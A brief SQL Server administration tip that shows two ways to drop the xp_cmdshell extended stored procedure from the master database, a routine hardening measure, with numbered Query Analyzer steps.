exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
◆◆◆◆◆◆◆◆◆◆◆◆◆
Method 2: after connecting with the Query Analyzer
Step 1, run: use master
Step 2, run: sp_dropextendedproc 'xp_cmdshell'
Then press F5 and the command completes.